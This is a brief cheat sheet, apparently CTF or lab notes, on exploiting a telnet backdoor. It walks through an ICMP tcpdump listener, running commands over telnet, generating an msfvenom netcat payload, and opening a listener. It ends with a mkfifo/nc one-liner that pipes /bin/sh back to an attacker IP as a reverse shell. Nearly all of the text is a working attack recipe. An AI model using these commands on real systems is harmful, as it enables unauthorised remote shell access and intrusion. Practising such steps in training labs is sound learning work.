<<<<Telnet backdoor enumerations>>>>
to start tcpdump listener in attacker machine >> tcpdump ip proto \\icmp -i tun0
CONNECT >> telnet IP PORT
TO FIND COMMANDS >> .HELP
TO RUN PING TO CHECK ATTACKER MACHINE IS COMMUNICATE WITH OUR MACHINE >>> .RUN ping tun0_ip -c 1
TO FIND NETCAT PAYLOAD IN METASPLOIT >> msfvenom -l payloads | grep netcat 
TO CREATE PAYLOAD >> msfvenom -p cmd/unix/reverse_netcat  LHOST=listener_ip  LPORT=444

AFTER CREATING A PAYLOAD COPY THE TEXT WHICH IS GIVEN BY THE PAYLOAD BY STARTING NETCAT SHELL >> rlwrap nc -lvnp 444
PASTE IN TENCAT CONNECTION TERMINAL >>>.RUN mkfifo /tmp/nxgalbq; nc 10.10.1.5 444 0</tmp/nxgalbq | /bin/sh >/tmp/nxgalbq 2>&1; rm /tmp/nxgalbq
NOW WE GOT REVERSE SHELL
